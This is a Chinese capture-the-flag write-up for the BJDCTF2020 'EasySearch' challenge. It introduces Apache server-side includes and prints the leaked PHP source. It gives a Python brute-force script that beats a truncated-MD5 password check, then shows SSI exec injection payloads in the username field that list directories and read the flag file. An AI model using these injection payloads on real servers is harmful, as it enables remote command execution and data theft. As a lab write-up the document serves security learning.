Apache-SSI远程执行漏洞
SSI简介
SSI(服务器端包含)是放置在HTML页面中的指令,并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面,而不必通过CGI程序或其他动态技术来提供整个页面。
例如,您可以将指令放置到现有的HTML页面中,例如:
<!--#echo var="DATE_LOCAL" -->并且,当该页面被投放时,该片段将被评估并替换为其值:
Tuesday, 15-Jan-2013 19:28:54 EST[BJDCTF2020]EasySearch 1
首先开扫,还是字典问题:这里有源码泄露:index.php.swp
源码:
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>- 代码逻辑:POST传参username不为空,且要绕过md5判断
$admin == substr(md5($_POST['password']),0,6),然后会打开一个随机名字的shtml文件将内容写入
贴上md5绕过脚本:
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)得到2020666、2305004、9162671等password
回显位$_POST[‘username’]为注入点利用SSI漏洞格式注入:
\\查看当前目录
<!--#exec cmd="ls"-->在请求头中发现回显url:
访问url:
\\访问上级目录
<!--#exec cmd="ls ../"-->
\\抓取flag
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
